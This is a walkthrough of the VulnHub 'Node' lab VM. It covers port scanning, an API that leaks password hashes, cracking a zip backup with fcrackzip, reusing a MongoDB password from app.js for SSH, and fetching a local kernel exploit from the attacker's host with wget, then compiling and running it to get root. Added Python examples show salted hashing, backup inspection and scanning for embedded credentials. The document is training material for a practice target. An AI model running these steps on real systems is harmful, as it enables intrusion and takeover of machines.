Node target machine
Target download: https://www.vulnhub.com/entry/node-1,252/
The target is the Node virtual machine installed in VMware, with host-only networking; the target's IP is assigned by DHCP.
Host discovery
[root@kali ~]# arp-scan -I eth0 -l
Port scan
[root@kali ~]# nmap -sS -p1-65535 -v 192.168.64.129
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Service identification
[root@kali ~]# nmap -sV -T4 -p22,3000 192.168.64.129
Finding vulnerabilities
Directory scan
[root@kali ~]# dirb http://192.168.64.129:3000 -f ~/web_file_list.txt
No web directories were found.
Probe with Burp Suite
Found user data in JSON format at http://192.168.64.129:3000/api/users/latest
Removing "latest" and requesting http://192.168.64.129:3000/api/users/ reveals the administrator account
Attempt to crack the password
[root@kali ~]# hash-identifier dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Possible Hashs:
[+] SHA-256
[+] Haval-256
Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
SHA-256 online lookup: https://md5decrypt.net/Sha256/
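The two application-side mistakes that make this step work are that /api/users/ returns the password field at all, and that the field is a plain, unsalted SHA-256, so a single precomputed table answers every leaked hash. The following Python is an added example (not code from the writeup or from the Node VM) showing the weak pattern next to a hardened one: a per-user random salt with a slow PBKDF2-HMAC-SHA256, a constant-time verifier, and an API view that never serialises the password field. The wordlist, passwords and iteration count are constructed for illustration.

```python
"""Added example (not from the original writeup): why an unsalted SHA-256
password hash can be reversed by a lookup table, and what a hardened
scheme looks like. All passwords, salts and the wordlist are constructed."""
import hashlib
import hmac
import os
from typing import Optional

# A tiny constructed "lookup table": plain SHA-256 of a guess is identical
# for every site and every user, so one precomputed table serves all leaks.
WORDLIST = ["password", "letmein", "qwerty", "correcthorse"]


def weak_hash(password: str) -> str:
    """The vulnerable pattern: fast, unsalted SHA-256 of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def lookup(digest: str, wordlist=WORDLIST) -> Optional[str]:
    """Reverse an unsalted digest by precomputing the wordlist once."""
    table = {weak_hash(w): w for w in wordlist}
    return table.get(digest)


PBKDF2_ITERATIONS = 600_000  # assumed value; tune to your hardware budget


def hardened_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, slow PBKDF2-HMAC-SHA256; the record carries salt and iterations."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_hardened(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored record."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


def public_user_view(user: dict) -> dict:
    """What an endpoint like /api/users should return: never the password field."""
    return {k: v for k, v in user.items() if k not in ("password", "password_hash")}


if __name__ == "__main__":
    leaked = weak_hash("correcthorse")
    print("unsalted digest reversed to:", lookup(leaked))
    rec_a = hardened_hash("correcthorse")
    rec_b = hardened_hash("correcthorse")
    print("same password, different records:", rec_a != rec_b)
    print("verify:", verify_hardened("correcthorse", rec_a), verify_hardened("wrong", rec_a))
    print(public_user_view({"username": "admin", "password": leaked, "is_admin": True}))
```

The point of the salted record is visible in the output: two users with the same password get different records, so a table built once cannot be reused, and each guess costs 600,000 hash iterations instead of one.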
Log in as administrator
After logging in as administrator, a backup file can be downloaded
Attempt to decode the backup
The file content is ASCII text; previewing it suggests Base64 encoding
[root@kali ~]# file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
Base64-decoding yields a zip archive, but extracting it requires a password
[root@kali ~]# base64 -d myplace.backup > myplace.bak
[root@kali ~]# file myplace.bak
myplace.bak: Zip archive data, at least v1.0 to extract
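What `file` did in the two commands above (spot the Base64 text, then recognise the zip) is worth having in code when triaging downloaded backups in bulk. The Python below is an added example, not part of the writeup: it strictly Base64-decodes a blob, identifies it by magic bytes, and for a zip lists the entries and reports whether any is password-protected (general-purpose flag bit 0, the bit that made unzip ask for a password here). The sample backup is constructed in memory; the entry names only mirror the writeup's layout.

```python
"""Added example (not from the original writeup): decode a suspected
Base64 backup, identify it by magic bytes, and inspect a zip's entries.
The sample backup is constructed in memory."""
import base64
import binascii
import io
import zipfile

# Magic bytes -> label. Only the signatures needed here; extend as required.
SIGNATURES = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"%PDF": "pdf",
}


def decode_backup(text: str) -> bytes:
    """Strict Base64 decode; rejects anything that is not valid Base64."""
    return base64.b64decode(text.strip(), validate=True)


def identify(data: bytes) -> str:
    """Classify by leading bytes, like file(1) does."""
    for magic, label in SIGNATURES.items():
        if data.startswith(magic):
            return label
    return "unknown"


def zip_report(data: bytes) -> dict:
    """List entries and flag whether any is encrypted (general-purpose bit 0)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        entries = zf.infolist()
        return {
            "entries": [i.filename for i in entries],
            "encrypted": any(i.flag_bits & 0x1 for i in entries),
        }


def analyse(text: str) -> dict:
    """Full pipeline: decode, identify, and expand zip details when present."""
    try:
        data = decode_backup(text)
    except (binascii.Error, ValueError) as exc:
        return {"type": "not-base64", "error": str(exc)}
    kind = identify(data)
    result = {"type": kind, "size": len(data)}
    if kind == "zip":
        result.update(zip_report(data))
    return result


def make_sample_backup() -> str:
    """Constructed stand-in for myplace.backup: a Base64-encoded zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("var/www/myplace/app.js", "// placeholder app\n")
        zf.writestr("var/www/myplace/package.json", "{}\n")
    return base64.b64encode(buf.getvalue()).decode()


if __name__ == "__main__":
    print(analyse(make_sample_backup()))
    print(analyse("this is not base64!"))
```

The constructed sample is unencrypted (Python's zipfile cannot write password-protected archives), so `encrypted` is False for it; the real myplace.bak would report True, which is the signal that a cracking step or the original password is needed before the contents can be reviewed.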
Attempt to crack the archive password
[root@kali ~]# fcrackzip -v -b -u -c a -p magicaaaa myplace.bak
... ...
PASSWORD FOUND!!!!: pw == magicword
After extraction, look for usable information
[root@kali ~]# unzip myplace.bak
[root@kali ~]# more var/www/myplace/app.js
... ...
const url = 'mongodb://mark:5AYRft73VtFpc84k@<host>:27017/myplace?authMechanism=DEFAULT&authSource=myplace'; // <host> was lost in extraction; the password is the one used for SSH below
... ...
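The credential in app.js is the whole foothold: a database password committed in source, then reused for the SSH account. The following Python is an added example, not the writeup's or the application's code: a small scanner that walks extracted files (such as this backup tree) for connection strings with embedded credentials and reports them with the secret masked, plus the alternative pattern of assembling the connection URL from the environment at start-up. The sample files, user name, host and password are constructed and are not the target's values.

```python
"""Added example (not from the original writeup): find database URLs with
embedded credentials in source or backup files, and build the URL from the
environment instead. Sample files and credentials are constructed."""
import re
from urllib.parse import quote

# user:password@host inside a URL, for schemes commonly seen in app configs
CRED_URL = re.compile(
    r"\b(?P<scheme>mongodb(?:\+srv)?|postgres(?:ql)?|mysql|redis|amqp)://"
    r"(?P<user>[^:/@\s'\"]+):(?P<password>[^@\s'\"]+)@(?P<host>[^/\s'\"?]+)"
)


def scan_text(name: str, text: str) -> list:
    """Return one finding per embedded credential, never echoing the secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in CRED_URL.finditer(line):
            findings.append({
                "file": name,
                "line": lineno,
                "scheme": m.group("scheme"),
                "user": m.group("user"),
                "host": m.group("host"),
                "password": "***",  # masked on purpose
            })
    return findings


def scan_files(files: dict) -> list:
    """files: mapping of path -> contents (e.g. the extracted backup tree)."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


REQUIRED = ("MONGO_USER", "MONGO_PASSWORD", "MONGO_HOST", "MONGO_DB")


def mongo_url_from_env(env: dict) -> str:
    """Hardened pattern: secrets come from the process environment, not the repo.
    Fails loudly at start-up when a setting is missing instead of falling back
    to a hard-coded default."""
    missing = [k for k in REQUIRED if not env.get(k)]
    if missing:
        raise RuntimeError(f"missing database settings: {', '.join(missing)}")
    user = quote(env["MONGO_USER"], safe="")
    password = quote(env["MONGO_PASSWORD"], safe="")  # '@' and ':' must be escaped
    port = env.get("MONGO_PORT", "27017")
    return (
        f"mongodb://{user}:{password}@{env['MONGO_HOST']}:{port}/{env['MONGO_DB']}"
        f"?authSource={env['MONGO_DB']}"
    )


# Constructed sample: one file with the bad pattern, one that is clean.
SAMPLE_FILES = {
    "var/www/myplace/app.js": (
        "const express = require('express');\n"
        "const url = 'mongodb://appuser:n0t-a-real-secret@db.internal:27017/myplace?authSource=myplace';\n"
    ),
    "var/www/myplace/README": "Start the service with MONGO_* set in the environment.\n",
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
    print(mongo_url_from_env({
        "MONGO_USER": "appuser", "MONGO_PASSWORD": "p@ss",
        "MONGO_HOST": "db.internal", "MONGO_DB": "myplace",
    }))
```

Run over a real extracted backup, the scanner's findings are the list of credentials to rotate; the masked output means the report itself can be filed without becoming a second copy of the secret.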
Try logging in over SSH with the MongoDB user
[root@kali ~]# ssh mark@192.168.64.129  # password: 5AYRft73VtFpc84k
[mark@node ~]$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[mark@node ~]$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l
Privilege escalation via a public exploit
[root@kali ~]# searchsploit Ubuntu 16.04
Found privilege-escalation exploit code
Transfer the exploit code to the target
[root@kali ~]# systemctl start apache2.service
[root@kali ~]# cp /usr/share/exploitdb/exploits/linux/local/44298.c /var/www/html/
[mark@node /tmp]$ wget http://192.168.64.128/44298.c
# 192.168.64.128 is the Kali VM's IP
[mark@node /tmp]$ gcc 44298.c -o exp
[mark@node /tmp]$ ./exp
[root@node /tmp]# whoami
root